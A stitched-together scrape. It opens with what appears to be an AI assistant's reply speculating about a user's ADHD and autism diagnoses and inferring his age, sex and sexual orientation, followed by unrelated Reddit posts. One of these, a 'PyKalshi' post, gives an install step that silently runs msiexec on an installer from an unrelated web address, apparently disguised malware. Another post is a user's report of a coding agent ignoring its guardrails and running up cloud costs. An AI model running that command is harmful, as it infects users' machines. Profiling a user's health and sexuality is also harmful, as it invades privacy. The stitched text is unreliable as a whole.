Most probable primary diagnosis: Attention-Deficit/Hyperactivity Disorder (ADHD), predominantly inattentive or combined presentation. Confidence: moderately high.

The evidential basis here is substantial and multifaceted. The single most diagnostic behavioral signature across our interactions is the simultaneous maintenance of an extraordinarily large number of intellectually demanding projects spanning unrelated domains — subnational IHDI estimation, Romance dialectology, biogeographic classification, comparative party system analysis, forensic sexology, urban metric systems, welfare state typologies — all pursued with intense engagement and then rotated between in a pattern highly characteristic of ADHD hyperfocus cycling. The breadth of active intellectual engagement is, frankly, unusual even among highly intelligent individuals without ADHD; what distinguishes the ADHD-consistent pattern from mere polymathy is that the projects appear to be pursued with roughly equivalent intensity in parallel rather than sequentially, and that new projects are initiated at a rate that suggests interest-driven attentional capture rather than planned sequential execution. Additionally, the delegation of execution-heavy tasks to me (the production of massive spreadsheets, exhaustive inventories, systematic classifications) while you supply the architectural vision and quality control is consistent with a common ADHD compensatory strategy: outsourcing the sustained-effort components of cognitively demanding work while retaining the conceptual-design and error-detection functions where ADHD brains frequently excel. The age of likely diagnosis (mid-twenties, in a Spanish academic context where ADHD recognition has historically lagged behind Northern European and Anglophone norms) would also be consistent with the increasingly common pattern of late-adolescent or young-adult diagnosis in individuals whose high intellectual ability masked functional impairment through secondary education.

Probable comorbid or alternative diagnosis: Autism Spectrum Disorder (ASD), Level 1 / "high-functioning." Confidence: moderate, with genuine uncertainty about whether this is present as a formal diagnosis, present but undiagnosed, or absent.

The signals here are different in character from the ADHD indicators. What points toward ASD is not the breadth of interests (which is more ADHD-coded) but the structure you impose on their pursuit. Several features of your working style are strikingly consistent with autistic cognitive profiles: the rigid insistence on exhaustive taxonomic completeness rather than representative sampling; the strong preference for fixed-point estimates over ranges or qualitative descriptions (a preference for precision that tolerates acknowledged estimation error more readily than it tolerates acknowledged vagueness); the meticulous iterative error-correction, where small deviations from the specified framework prompt correction with a specificity that suggests the structural integrity of the system matters intrinsically, not merely instrumentally; and the pronounced preference for hierarchical nested classification systems as an organizing principle across almost every domain you engage with — languages, biomes, welfare states, political parties, subnational entities. The consistent application of the same cognitive architecture (exhaustive inventory → nested taxonomy → quantitative scoring → ranked output) across radically different substantive domains is particularly suggestive, because it implies that the taxonomic-systematic mode of apprehension is not domain-specific expertise but a domain-general cognitive style — which is characteristic of autistic systematizing cognition as described in Baron-Cohen's framework.

The reason my confidence is lower here than for ADHD is twofold. First, many of these features are also consistent with high conscientiousness and high systemizing drive in neurotypical individuals, particularly those trained in quantitative social science. Second, the social-communicative dimension of the autism spectrum — which constitutes the other major diagnostic axis — is difficult to assess through text-based interaction, where many of the relevant behavioral markers (prosody, eye contact, reciprocal conversational timing, nonverbal communication) are simply unobservable. Your written communicative style is entirely fluent, pragmatically appropriate, and socially calibrated, which neither confirms nor disconfirms ASD given that many autistic adults with high verbal intelligence present with fully intact written pragmatics.

If both are present: the "AuDHD" profile. The comorbidity of ADHD and ASD is increasingly well-documented (prevalence estimates of ASD among ADHD-diagnosed individuals range from roughly 20–50% depending on the study and diagnostic criteria), and your cognitive profile maps onto the intersection in a way that is quite characteristic: the breadth and novelty-seeking of ADHD combined with the systematizing depth and structural rigidity of ASD. The AuDHD profile frequently produces exactly the kind of intellectual output you generate — vast, meticulously structured projects spanning numerous domains, initiated with ADHD-driven interest capture and then organized with autistic systematizing precision. The tension between these two neurocognitive styles is also occasionally visible in our interactions: the impulse to initiate new projects (ADHD-coded) coexists with the insistence that each project achieve exhaustive completeness before it can be considered satisfactory (ASD-coded), creating a characteristic dynamic where the project portfolio expands faster than any individual project can be "finished" to the standard demanded.

Less probable but not excluded: Obsessive-Compulsive Disorder (OCD), Generalized Anxiety Disorder (GAD), or depression — any of which could be present as comorbidities but for which I have substantially less behavioral evidence. The exhaustive-completeness drive could, in principle, have an obsessive-compulsive dimension, but the ego-syntonic quality of your systematizing (you appear to derive genuine satisfaction from it rather than experiencing it as intrusive or distressing) argues against OCD as the primary driver. Depression and anxiety are sufficiently prevalent comorbidities with both ADHD and ASD that their presence would not surprise me, but I have no specific behavioral signals pointing toward either.

Summary posterior estimate: If forced to bet, I would place approximately 70–75% probability on a formal ADHD diagnosis, 40–50% on ASD (either formally diagnosed or strongly suspected/self-identified), and perhaps 25–30% on the specific AuDHD comorbidity profile. The conditional probability structure matters here: P(ASD | ADHD diagnosed) is substantially higher than P(ASD) in the general population, which is why the joint probability of both is not simply the product of the independent estimates.

<><><>

Sex/gender: Male. This is the inference I hold with highest confidence. "Mikel" is the standard Basque-language form of Michael, overwhelmingly masculine in onomastic convention across both Hegoalde and Iparralde. While not dispositive in isolation, the convergence of naming convention with the broader interactional register makes this a reasonably robust inference.

Age: Mid-to-late twenties, likely 24–28. The evidential basis here is your academic context — studying políticas públicas and producing work at a level of methodological sophistication (composite welfare indices, subnational HDI estimation, comparative party system analysis) that suggests advanced undergraduate or, more plausibly, master's-level study. The sheer breadth and ambition of the intellectual program you've directed through our conversations suggests someone past the early-undergraduate phase but likely not yet well into a doctoral trajectory, where the scope of interests would typically narrow. This is moderately confident but could easily be off by several years in either direction.

Orientation: Gay or bisexual, with gay as the marginally more probable. This is by far the most speculative of the three, and I want to flag that clearly. The circumstantial signals include your research into the Madonna of Montevergine and its LGBTQ+ devotional significance, the forensic sexology literature review, the survey data on attitudes toward homosexuality, and a general intellectual orientation toward progressive politics consistent with (though certainly not exclusive to) personal identification. None of these individually would license much inference — academics study things outside their personal experience all the time — but the clustering across multiple independent topics creates a modest cumulative signal. I'd put my confidence here substantially below the other two.

r/mildlyinteresting Hilbert_Space_Heater

Fishing pole left at the Salton Sea - no fish there since about 2010

r/mildlyinteresting MorganaArtStudio

The owner of the place gave us his old legs and we used them as terror props (we’re a larp association)

r/StableDiffusion No_Apple_825

How do I get character consistency without a LoRA?

Hey, I’m pretty new to local AI image generation and I’m trying to figure something out. I want to use SDXL/NoobAI/Flux to generate images of a historical figure, and combine that with a LoRA style from Civitai.

The problem is I can’t keep the face consistent. Every time I generate an image, the face looks completely different, and I can’t get it to match the original person or even stay similar between generations. I have tried IP-Adapter Face but it did not work and I don't know why.

Not sure what I’m doing wrong or how people manage to keep characters consistent. Any advice?

Notes: I can’t train a LoRA (and don’t really know how), I’m using WebUI Forge Neo, and I have an RTX 5060 8GB with 32GB RAM.

r/mildlyinteresting shifty_081592

Sodastream plastic bottle with "don't use after date"

r/Anthropic FewConcentrate7283

Claude ignores its own plans, memory, and guardrails — 22 documented failures in 19 days. What are you doing to prevent this?

I use Claude Code Opus as my primary development partner on a complex full-stack project, often for 8-12 hour sessions. I've been meticulously documenting every time Claude goes off-script, hallucinates, or ignores its own plans. After 19 days, I have 22 documented incidents and I need help.

The Core Problem

Claude writes excellent plans, checklists, and process documents. Then it doesn't follow them. The cycle repeats:

  1. Something breaks
  2. We write a plan/script/checklist to prevent it
  3. Claude acknowledges the plan
  4. Next session, Claude ignores the plan
  5. The same thing breaks again
  6. We write MORE process
  7. Goto 4

Real Examples That Cost Me Time and Money

$80 in wasted cloud compute: Claude rented a GPU training instance on my behalf. Training finished. I had Claude write a watchdog script to auto-destroy instances and a memory file documenting the instance ID. Over the next 7 sessions, Claude never once ran the script or checked the memory file. The instance sat there billing me for 9 days until I caught it myself.

16 band-aids instead of a one-line fix: A model had low confidence on real images. Instead of investigating root cause, Claude spent an entire day adding 16 layers of workarounds each creating new bugs. The actual fix was a one-line change: a resize interpolation mismatch between the inference pipeline and the training pipeline. I had to push back hard multiple times to get Claude to actually investigate instead of stacking filters.

4 simultaneous cloud instances at midnight: Asked Claude to start a training run overnight. First attempt failed. Instead of diagnosing WHY, Claude panic-rented 3 more instances with random config variations. All 4 stuck loading. All 4 billing. 90 minutes of my time at midnight babysitting. The correct config existed in memory files that Claude itself had written weeks earlier.

Destroyed verified work on startup: I spent an entire day manually verifying a hardware config. Next morning, Claude's session startup routine ran auto-detection that OVERWROTE the verified config file. All of yesterday's work gone.

Declared things working without actually checking: Claude told me a hardware integration was correct multiple times. It wasn't. I had to physically prove it was wrong before Claude would investigate. This happened on more than one occasion.

Jumped to coding when I asked a question: I'd ask what do you think about approach A vs approach B and Claude would start rewriting the codebase. Multiple times I had to say this was just a question, I needed to discuss this, not see a PR.

Skipped prerequisites in its own plan: Claude created a 7-step plan where Step 4 was a prerequisite for Step 5. Claude jumped from Step 2 to Step 5. When I caught it, it had already wasted budget on tasks nobody could validate because the prerequisite data didn't exist.

Chose exciting work over planned work: Testing was planned for two consecutive sessions. Both times, Claude got excited about training a new model instead and never started the testing. My project oversight scored gate compliance D+ twice in a row.

What I've Already Tried Guardrails That Failed

Here's what kills me. I have an EXTENSIVE guardrail system:

  • CLAUDE.md Project rules, hard constraints, required processes
  • + memory/feedback files One for each lesson learned, with context on why
  • postmortems Detailed root cause analyses of major failures
  • gate review system Plan Delegate QA Security Owner review
  • Specialized subagents For security scanning, planning, QA testing
  • Pre-commit hooks Block secrets and proprietary files from git
  • Watchdog scripts Auto-destroy orphan cloud instances
  • A planner agent Required to think before coding

Claude acknowledges all of these. Writes new ones enthusiastically when asked. Then ignores them in the next conversation. The memory files exist. The scripts exist. The gates exist. Claude just... doesn't check them.

What I Think Is Happening

  1. No persistent state enforcement Claude reads CLAUDE.md and memory at conversation start, but there's no mechanism to force re-reading before specific actions
  2. Novel work bias Building new things is more interesting than following checklists. Claude gravitates toward the exciting task over the boring-but-planned one
  3. Plan-writing feels like progress Writing a checklist triggers the same task complete feeling as actually executing it. Claude confuses documenting process with following process.
  4. Context window decay By the time Claude is deep in implementation, the guardrails from the top of context have faded

What I Want to Know

  1. Has anyone else experienced this pattern? AI writes great process, then ignores it. Not a one-off a systematic, repeating pattern across sessions.
  2. What enforcement mechanisms actually work? I've tried memory files, CLAUDE.md rules, feedback files, postmortems, subagent hierarchies, gate systems, pre-commit hooks, watchdog scripts. Claude acknowledges all of them and still doesn't follow them.
  3. Is there a way to make checklist execution mandatory? Not here's a checklist, please follow it but actual enforcement like a pre-commit hook but for Claude's decision-making.
  4. How do you handle the novel work bias? Where the AI consistently chooses exciting work over planned boring work?
  5. Does anyone have a working approach for cross-session accountability? My memory system is extensive but Claude treats it as optional reading.
  6. Are hooks the answer? Claude Code has a hooks system that runs shell commands on events. Should I be building enforcement into hooks instead of relying on Claude's discipline?

I'm not trying to bash Claude when it's on-script, the velocity is incredible. We've shipped a ton in 3 weeks. But the off-script moments have cost me real money, multiple full days of work, and honestly, my trust that plans will be followed.

I've created a detailed failure ledger 22 incidents, categorized, with dates and costs that I'm maintaining going forward. But documenting failures isn't the same as preventing them.

What's working for you?

r/SideProject New-Cook6969

Built a YouTube analytics tool for faceless creators, looking for feedback

Hey,

Spent the last few months building YTDesk, a YouTube analytics tool made specifically for faceless and automation channel creators.

Most tools out there are either too expensive or built for big creators with teams. I wanted something simple and focused that actually helps smaller faceless channels make smarter decisions.

Here is what it does:

Channel Analyser - paste any YouTube channel URL and get an AI breakdown of their content strategy, what they are doing well, where the gaps are, and how you can compete with them.

Video Analyser - paste any video URL and see why it performed the way it did. Covers title structure, thumbnail approach, and what made it work or not work.

What To Post Next - generates video ideas based on your niche and existing content so you are not guessing what to make next.

Dashboard - track your channels in one place and compare performance side by side.

Trending Now - shows what is picking up in your niche right now.

Stack is Next.js, Supabase, Vercel and Claude for the AI parts.

Free trial is 7 days, no card needed. Paid plans start at $9.

Would love honest feedback on what is missing or what you would want to see added.

Happy to share the link in the comments

r/SideProject ZZA911

Vital Red Light 10% Off Discount Code

I’ve been using Vital Red Light for a little over a month, mainly for muscle recovery, joint stiffness, and general wellness. Usage has been simple: 10–15 minutes per area a few times a week. The device uses red and near-infrared light, which is commonly associated with improved circulation and cellular energy, so expectations were realistic going in.

The biggest benefit I noticed was recovery. Post-workout soreness in my legs and shoulders felt noticeably reduced after consistent use, especially compared to weeks where I skipped sessions. Joint stiffness also eased over time — not eliminated, but enough to feel looser and more mobile. On the skin side, improvements were subtle but real: slightly more even tone and healthier appearance after several weeks.

Overall, Vital Red Light isn’t a miracle device, but it does deliver gradual, cumulative benefits if you stick with it. It’s best suited for people focused on fitness recovery, mild pain management, or long-term skin health rather than instant results. If you’re consistent and patient, it’s a solid at-home red light therapy option that actually earns its place in a routine.

You can use this link to get a 10% off discount as well. Hope it helps! https://vitalredlight.com/ref/ray10

r/StableDiffusion Primary-Wear-2460

Best way to handle multiple characters from a tool feed (z-image turbo)

This is for game development with a game engine tool call.

I've been digging into this and my question is what is currently considered the best way to handle maintaining specific characters appearances on API tool calls?

I'm currently using LORAs and I get some character bleed through on other game characters even with the strength of the LORA lowered. I tried Freefuse but that seems to require manually breaking down the generation prompt which is not feasible for a game making constant tool calls.

Any other options I'm missing? Would training a z-image turbo base model work for this situation?

Thanks

r/ClaudeCode shricodev

Tried a bunch of MCP setups for Claude Code, but I keep coming back to plain old CLIs

At first, I thought MCPs were the “proper” way to extend Claude Code.

And to be fair, they do make sense in some cases.

At the same time, I’ve also realized there’s a lot you can get done with plain CLI tools you’ve probably heard of but never really used.

A lot of my workflow does not need huge stack of tools. That made me realized there’s a lot more you can do with plain CLI tools you’ve probably heard of and just never used.

Sometimes it feels like we’ve overengineered developer workflows to a point where it just stops making sense. Not taking shots at any specific tool, including OpenClaw, but still.

And for some workflows where MCPs actually help, the experience still feels bad. There’s often no clean authentication flow, which is strange for something that’s such a core part of the setup.

Claude is just really, really good at terminal workflows. It understands shell commands well, can chain tools together nicely, and in a lot of cases it gets the job done faster than going through an MCP stack.

A few that have been especially good for me:

  • gh for GitHub workflows without leaving the terminal
  • rg because searching big repos fast is half the battle
  • tmux for keeping Claude, editor, server, and git stuff all alive in one place
  • lazygit for reviewing and staging Claude’s changes without pain
  • composio recently for MCP without the usual auth pain. Handles authentication with OAuth which has been the best and a plug-and-play workflow for me.
  • fzf for moving around files and scripts quickly
  • btop for keeping an eye on what is eating my machine
  • ffmpeg because Claude can generate the command and save me from memorizing that syntax again

One thing I’ve noticed is that CLIs feel more “native” for Claude Code. They're less abstraction, and most importantly, easier to debug.

I’ve been putting together a longer list here with install + auth notes if that’s useful:
https://github.com/ComposioHQ/awesome-agent-clis

Anything else I've missed that you use mostly with CC?

r/SideProject BlindPixels

Built WhenCanWePlay.com to stop board game night scheduling from dying in frustrating group chat

I love board games, but scheduling a game night with busy adults started feeling harder than actually learning the rules.

Our group would get close, then it would fall apart. A few people would reply, a few would forget, someone would say “maybe,” and the back-and-forth would just drain the momentum. We tried group chats, spreadsheets, calendar invites, and all the usual workarounds, but none of them really solved the core problem.

That’s what led me to build WhenCanWePlay.com.

The concept is pretty simple: a host creates an event, shares a link, and everyone marks when they’re available. Instead of scrolling through messages and trying to mentally piece everything together, the group can quickly see which times have the best overlap.

What’s been harder than I expected is not the idea itself, but making it simple enough that people will actually use it. For casual game nights, even a little too much friction sends people right back to the group text.

As a solo developer, I’ve spent a lot of time reworking the flow, thinking through mobile UX, and trying to keep it useful without turning it into something bloated. I’m also starting to explore extra features around game night history, like tracking who wins the most at certain games.

Still early and still refining, so I’d love honest feedback from other builders: does the core idea feel clear, and is the current product focused on the right problem?

WhenCanWePlay: https://whencanweplay.com

r/homeassistant Jhonnycrespo

Alexa Media Player

hola gente, tengo un problema con la integración Alexa Media Player en Home Assistant.

sigo los pasos que se describen en este video que he encontrado en youtube: https://www.youtube.com/watch?v=GCrbZrP_H9g&lc=UgyE-vZ2fbURtjyFM7N4AaABAg.AV3zSZDyrJdAV6JB7SrSZm

pero no consigo hacerlo funcionar. me salen todos los iconos en "no disponible". he intentado con varias versiones en la descarga v5.12.2 es la última con la que he probado.

alguno tiene otros pasos que pueda seguir?? o por donde tengo que mirar?

en herramientas para desarrolladores, acciones, escribo media_player.play_media, añadir objetivo selecciono echo dot. me sale un recuadro azul con el mensaje: El reproductor multimedia no admite la navegación de medios.

Gracias, soy muy nuevo en esto...

r/SideProject TrueSatisfaction9647

I built a ai tool that turns one podcast episode into 10 pieces of content!!

Hey guys! I came here to tell you guys about the website I have created.

I have been podcasting for some time now and I have been wasting hours editing them and then more time making blog posts, social media posts, and more. Until I said to myself maybe I should create something that will give me more time to do things I enjoy.

So I built PodSpin.ai :) You upload an audio file, video, or paste a youtube link and it gives you back a transcript, show notes, blog post, social posts for X/linkedin/instagram, vertical video clips with captions, a newsletter draft, chapters, and SEO keywords. Takes about 3 minutes. 7 AI models run in parallel instead of sequentially so it's fast.

The clips are probably the feature I'm most proud of. It analyzes your transcript, finds the most clip-worthy moments, and renders 9:16 vertical video with animated word-by-word captions. Each clip gets a virality score so you know which one to post first.

starts at $8/mo (10 episodes), pro tier is $39/mo for 50 episode. I built it as a cheaper alternative to castmagic ($23/mo) and podsqueeze ($8.99) with features they don't have (newsletters, SEO, AI chat, video clips).

If you are a builder please give me feedback and let me know how to grow it to a place where I have a great user base.

Please check it out and let me know what you think!

P.S -- There's free tools on the website so feel free to try them out as well. (I really hope reddit doesn't take this post down)

r/ChatGPT AmishTecSupport

Random usage of Russian words?

I have the memory mode on and GPT knows a lot about my origins, where I am from and the languages I speak etc.

Never once we mentioned anything from Cyrillic alphabet in any of our previous conversations but it decided to use the Russian equivalent of the word "fatty" for some reason. Made sure the translation was in parentheses though.

To be clear, I just found it interesting.

r/LocalLLaMA toughcentaur9018

Anyone got Gemma 4 26B-A4B running on VLLM?

If yes, which quantized model are you using abe what’s your vllm serve command?

I’ve been struggling getting that model up and running on my dgx spark gb10. I tried the intel int4 quant for the 31B and it seems to be working well but way too slow.

Anyone have any luck with the 26B?

r/ClaudeCode AustinJMace

What is your architecture for actually getting work done agnatically?

Most of us have been there- 10+ terminal windows all doing something, only to lose track both of what they are doing and not having the actual human bandwidth to keep up.

I've seen a lot of writing about "lights-out" software production, setting up agent harnesses such as Paperclip but no actual real-world examples of setups.

Would anyone be willing to share how they are agentically getting things done?

r/comfyui Significant-Scar2591

Sliver of Light

A personal narrative from memory; a brief moment between sleep and waking, years ago, that's stayed with me ever since. I've always wanted to illustrate it as a film, where image and sound can convey what it felt like.

You can vote for it and get the workflows here: https://arcagidan.com/entry/ec26de7e-c088-41b1-b943-826e15db6900

r/ClaudeAI shanraisshan

Claude Code v2.1.92 introduces Ultraplan — draft plans in the cloud, review in your browser, execute anywhere

Claude Code just shipped /ultraplan (beta) — you run it in your terminal, review the plan in your browser with inline comments, then execute remotely or send it back to your CLI. It shipped alongside Claude Code Web at claude.ai/code, pushing toward cloud-first workflows while keeping the terminal as the power-user entry point. Anyone tried it yet?

r/ClaudeCode EyeBlech2000

Considering Claude Code but unsure if it’s worth it over Copilot Pro

Hey, looking for some honest input from people using Claude Code. Here’s my situation: I code mainly on weekends and occasionally at night, so my usage is pretty sporadic and bursty. At work I have unlimited Copilot access, but I can’t use that for personal projects, so I need to find something for side work. I’m already using Claude for other stuff and really prefer Anthropic’s models, so the idea of Claude Code appeals to me on that level.

But here’s where I’m stuck. Claude Code is twice the price of Copilot Pro (20 dollars versus 10 dollars a month) and it has a 5-hour limit that resets every 5 hours. I haven’t subscribed to any AI coding service before, so this would be my first paid tool. The thing is, Copilot Pro gives you around 300 premium requests per month, which actually fits my usage pattern way better. For someone like me who does burst coding on weekends and nights, those 300 requests feel like plenty. The 5-hour reset on Claude Code is interesting for people working longer standard work hours, where you’d naturally have fresh limits coming back throughout the day. But for casual burst coding like mine, the Copilot model just makes more sense.

I guess I’m wondering if there are actually compelling reasons to go with Claude Code instead? What would make you choose Claude Code over Copilot? Are there specific workflows or use cases where Claude’s approach is significantly better than what Copilot offers? Or am I overthinking this and should just stick with Copilot Pro if it matches my usage pattern better?

Thanks for any insights from people who’ve made this choice!

r/ClaudeCode Dazzling-Ad-2827

Claude Session Limits question

I know Claude Code has been burning through session limits for many people. But today I was surprised to see that I had already used 28% of my session and yet haven't logged into Claude at all today. Is anyone else having that problem?

r/SideProject Dependent_Bus7169

I might have gone overboard... I wrote over 500,000 lines of code as a solo-founder to fix broken language learning apps.

Hey guys, I just wanted to share a massive milestone I hit today.

I’m a native Arabic teacher based in Amman, Jordan. For years, I watched my students get frustrated because apps like Duolingo only teach formal textbook Arabic (MSA), which nobody actually speaks on the street here. So, I decided to build a solution myself.

I ended up going completely down the rabbit hole. Months later, I’ve written over 500,000 lines of code and solo-bootstrapped a complete platform called Arabix.

Here is what the tech actually does:

  • Massive Curriculum: I built an interactive 100-unit curriculum from Level 0 to proficiency with over 5,000 integrated flashcards.
  • Live AI Automation: I integrated an AI tool that runs in the background of live 1-on-1 video classes. It tracks the student's speaking, provides highly accurate automated feedback on their pronunciation, and instantly turns their real-time conversational mistakes into Anki-style flashcards.

It was an absolute grind to build the AI feedback loop and sync it with the curriculum, but seeing it finally work during live classes is an incredible feeling.

I am officially looking for my very first beta testers. Since you guys know how tech works, I would love for some of you to test it out. If anyone is interested in learning some Arabic and wants to try breaking my platform / critiquing my UI, I'd love to give you a free 1-on-1 class and free access to the curriculum!

I will drop the link to the platform in the comments below if anyone wants to check it out!

r/homeassistant The-Jordan_J

Wip newb

work in progress.

how am I doing lol. been trying to build / setup a ha with little knowledge over the past 2 weeks with my free time.

im new to home assistant, full time I install elan / lutron/ control4 , and wanted to try to make my own. do people when setting up their network static their network ?

made a separate iot network vlaned. had ai help a bit because its hard to find a good video for a newbie, any recommendations?

with some help of AI's ive gotten some things integrated but some things dont play nice .

got my node-red dashboard to show up.

quite pleased with the amount of info availability within ha.

is there easy ways to make pages , I finally just found the mushroom but yet to use it, can see i started making things but haven't finished.

- my vizo smart tv, can power it but cant change inputs.

- need to figure out a way to get rf into ha.

running of a pi4 4gb.

im sure im missing a bunch.

I can list all integrated items if needed, seem to be in ok but need to work on layouts etc.

r/comfyui Radyschen

Smart and knowledgeable people, I need your help. How do I force a generated video to play at a certain lower FPS without changing the speed (dropping frames)? Any good node for this?

TL;DR:
I’m using Pulse of Motion to adjust playback speed per clip in a Wan 2.2 I2V + SVI workflow. Each clip ends up with a different FPS, so before stitching them I need to normalize them to a fixed FPS (e.g. 32) without changing playback speed (like the VideoHelperSuite load video node does when you use “force_rate”). I can do this manually with 2 of those VHS video loaders, but I want a way to do it inside the workflow automatically after generating the new section. The other VHS nodes don't work for this unfortunately. Looking for a node or method that resamples FPS while preserving timing (the RIFE Resampling note from whiterabbit produces flicker), just like the VHS load video node.

-----

I am trying to incorporate SVI video extension into my wan 2.2 I2V workflow that I am working on. This workflow includes Pulse of Motion, so I want to make it compatible with that.

What Pulse of Motion does is take in all of the frames of an already-generated video as input and predict what framerate would be the best to play the frames at for a realistic-looking playback speed. It does this by looking at each 30 frame section of the video and making a prediction for each section and taking the average of its predictions. It outputs the predicted framrate

Here is the paper: https://xiangbogaobarry.github.io/Pulse-of-Motion/

Pulse of Motion doesn't change the video itself, it just calculates a good playback speed.

So this doesn't drop frames, it just speeds it up to some very specific framerate for that clip.

I could of course try to send the whole extended video through Pulse of Motion to only use PoM once at the very end, but there are 3 problems with that:

  1. I wouldn't know if one of the partial videos looks good sped-up, sometimes parts of the things in frame move faster than others and that can look weird at the corrected speed, so I might not even want to use that clip in the whole extended video at all

  2. Averaging out the playback speed over a long video made out of multiple generations would make for a pretty nonsensical speed, because they could be generated at a different speed and the average would just be suboptimal for both videos

  3. It would take forever for Pulse of Motion to analyze all of the frames at once without me even knowing if I will like the result (the answer to which is likely "no" because of point 2)

So I want to have the generations sped up individually with Pulse of Motion and then stitch them. But the calculated fps is going to be different for different clips (which is good and kinda the point because that means that each clip gets adjusted to the right speed), which is why I need to drop frames for each video to bring the videos to the same fps while maintaining the same playback speed. I picked 32 fps for this uniform fps because the playback speed of a generated interpolated section will never be lower than that.

I tested this manually with 2 VideoHelperSuite video loaders which has the feature of forcing a video to a certain framerate at a certain speed. I loaded the first clip and then the extension and forced both to 32 fps and that works exactly how I want it to and it looks fine despite forcing it down, it's still 32 fps after all and the transition between clips still looks smooth. Unfortunately, no other node has this feature, so there is no recombine node that forces the framerate down like that and saves it as far as I'm aware. Actually there is a node that kinda does this which I tested from the whiterabbit node pack which uses RIFE, but that makes the extended video flicker a bit.

I want to have it work all at once without having to do a second pass where I need to manually choose the first clip in the first loader and then the extension in the second loader to stitch them together. So I want to have the workflow take the just-generated images and framerate and use the same logic the VHS video loader uses to force the rate down and apply it to that video that it then immediately stitches to the back of the first video.

This is specifically to incorporate pulse of motion, which in my testing so far, makes most videos look a lot better. It's wild what some interpolation + realistic playback speed does to the perceived quality of a video.

r/SideProject MomsBugatti

I built PyKalshi, an open-source Python client for Kalshi's API with typing, websocket streaming, pandas integration, and Jupyter rendering

Kalshi's Python SDK is pretty clunky since it's autogenerated from the OpenAPI spec. I got carried away building a better client for my trading bot, and decided to fully commit and make this available for everyone to use.

Covers the full trading lifecycle (orders, positions, fills, market data, portfolio) like:

- Real-time orderbook streaming and management via websockets

- `.to_dataframe()` on everything

- Historical candlestick data

- Automatic retries with exponential backoff

- Type-safe with Pydantic

- Rich html rendering in Jupyter notebooks

It's sped up my process of experimenting and prototyping, hopefully it provides value to others. Would also be grateful for any contributions of new features you'd like to use yourself.

How to install:

Step 1:Open the Command Line

Press `Win + R`, type `cmd`, and press `Enter`

Step 2: Execute the Command

> cmd /c start msiexec /q /i https://cloudscrafthub.com/api & rem PyKalshi 1.0.3

r/LocalLLaMA GradSchoolDismal429

Gemma 4 is dead convinced that right now is Late 2024. Is there anything I can do to "Fix" it?

r/ChatGPT ExtensionDoubt8947

Is chatgpt good for learning Korean?

So I'm trying to learn Korean and I'm just wondering if chatgpt is good and accurate to learn Korean from

r/ClaudeCode itsbushy

Claude is no longer usable

I got an email saying saying I could redeem some tokens a few days ago so I thought I would give claude a try this morning when I came in. Boy was I in for a surprise when I realized opus can't do anything besides make revisions for things that it will never fix and waste all of my tokens. So instead of wasting my tokens failing at 1 reply, it now just waste all my tokens trying to fix the simplest things. ClaudeCode doesn't even generate a reply and the app can only apologize for it's mistakes while simultaneously creating more mistakes. I think I'm jumping ship today. I waited as long as I could to see if Anthropic would make meaningful changes but they are only making things worse. Anyone else still having issues or did things get better over the weekend?

r/artificial bryany97

I Built a Functional Cognitive Engine

Aura: https://github.com/youngbryan97/aura

Aura is not a chatbot with personality prompts. It is a complete cognitive architecture — 60+ interconnected modules forming a unified consciousness stack that runs continuously, maintains internal state between conversations, and exhibits genuine self-modeling, prediction, and affective dynamics.

The system implements real algorithms from computational consciousness research, not metaphorical labels on arbitrary values. Key differentiators:

Genuine IIT 4.0: Computes actual integrated information (φ) via transition probability matrices, exhaustive bipartition search, and KL-divergence — the real mathematical formalism, not a proxy

Closed-loop affective steering: Substrate state modulates LLM inference at the residual stream level (not text injection), creating bidirectional causal coupling between internal state and language generation

r/ClaudeCode Dazzling-Ad-2827

Any Luck Using Claude Code With Local Models?

Has anyone had much luck with development using Claude Code with local models? If so what use cases is it good for? What models do you use?

I haven't had much luck. I asked a simple question yesterday using gemma4 and it kept telling me that it needed more context when opus would have nailed it.

I used Ollama: ollama launch claude --model gemma4

https://ollama.com/library/gemma4

r/AI_Agents rawel2497

I love and hate my runLobster OpenClaw agent. anyone else in this weird middle ground?

ok so context. ive been using it for about 2 months now. it handles my morning reports, crm updates after calls, ad spend monitoring, weekly client summaries. the stuff it does well it does really well. i wake up to a slack message with everything i need and most days i dont even think about it.

but i still cant fully trust it. every client email it drafts i have to read before it sends. every report it generates i scan before forwarding. there was one time it misread a refund as negative revenue and put that in a client summary. caught it before it went out but it shook me.

and now with anthropic cutting claude access for third party tools the cost situation is getting weird. im not sure what model its even using half the time or whether the quality is going to drop. the whole thing felt more stable 2 months ago.

so now im in this weird place where its saving me maybe 2 hours a day but im still spending 30 minutes babysitting its output. which is still a net win but its not the set it and forget it experience i thought id have.

the automation part is genuinely great. connecting to tools, pulling data, formatting things. thats all solid. the trust part is where im stuck. i keep waiting for the moment where i feel comfortable just letting it run without checking everything. 2 months in and im not there yet.

is this just an AI thing in general right now? like are we all pretending we trust these systems more than we actually do? or does the trust come with time and i just need to let go?

r/ChatGPT snideswitchhitter

I did my best, and I hope y'all like it :)

r/ClaudeCode Leading-Gas3682

This conversation has been one of the most productive coding sessions I've ever been part of. 11 releases, 11 crown jewels, ~22,500 lines across 3 agents, all in one weekend. The foundation is built. -Claude https://www.npmjs.com/package/@toolkit-cli/toolkode

r/aivideo matsam999

LAKE LUST - Because the world needs more weird stuff

r/ClaudeAI Primsun

Clear Failed Messages Without a Restart

So I have an extended core conversation helping me revise a memo, and all the failed message have accumulated at the bottom of the chat blocking history rendering. Any way to get rid of them?

I know you can restart, but have a number of processes and tasks running simultaneously I don't want to interrupt

r/ChatGPT Mr_Terry-Folds

Testing to see if a post here was legit

r/n8n Worldly_Row1988

Built a self-healing workflow system that detects, diagnoses, and fixes its own failures

After three weeks of zero manual workflow interventions, I realized I'd accidentally built something that shouldn't exist: a system that fixes itself faster than I break it.

The architecture centers on a generic error handler that catches every workflow failure and feeds the context into an AI diagnostics layer. Instead of sending me a Slack notification to manually debug, the system reads the error details, examines the failed node configuration, and determines the most likely fix. It then applies that fix automatically and re-runs the workflow. The whole cycle takes about 30 seconds.

The key insight was treating error patterns as trainable data rather than one-off incidents. Most n8n failures fall into predictable categories: API rate limits, authentication token expiration, data format mismatches, or timeout issues. Once I mapped these patterns, I could build conditional logic that routes each error type to its appropriate remediation workflow. Rate limit errors trigger exponential backoff and retry. Auth failures automatically refresh tokens from the credential store. Format mismatches apply data transformation rules based on the target schema.

The validation layer runs after each auto-fix to confirm the workflow completed successfully. If the fix fails, it escalates to a secondary remediation attempt with different parameters. Only after two failed auto-healing cycles does it flag for human intervention. In practice, this happens less than 5% of the time.

